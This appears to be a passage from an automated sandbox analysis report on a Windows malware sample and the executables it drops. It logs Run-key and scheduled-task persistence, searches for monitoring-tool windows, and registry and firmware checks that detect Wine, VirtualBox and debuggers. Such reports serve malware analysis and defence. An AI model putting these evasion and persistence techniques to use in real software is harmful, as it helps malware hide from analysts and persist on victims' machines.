Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ccdb824191.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ccdb824191.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cd39094ad6.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cd39094ad6.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5cbc6b58d3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5cbc6b58d3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7ea0decd34.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7ea0decd34.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_2-9742

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 4b8eda303b.exe, 0000000C.00000003.2728432336.0000000007E31000.00000004.00001000.00020000.00000000.sdmp, 2656cd82fe.exe, 0000000D.00000002.2880704353.0000000000F1D000.00000040.00000001.01000000.0000000B.sdmp, 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: 4b8eda303b.exe, 0000000C.00000003.2728432336.0000000007E31000.00000004.00001000.00020000.00000000.sdmp, 2656cd82fe.exe, 0000000D.00000002.2880704353.0000000000F1D000.00000040.00000001.01000000.0000000B.sdmp, 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
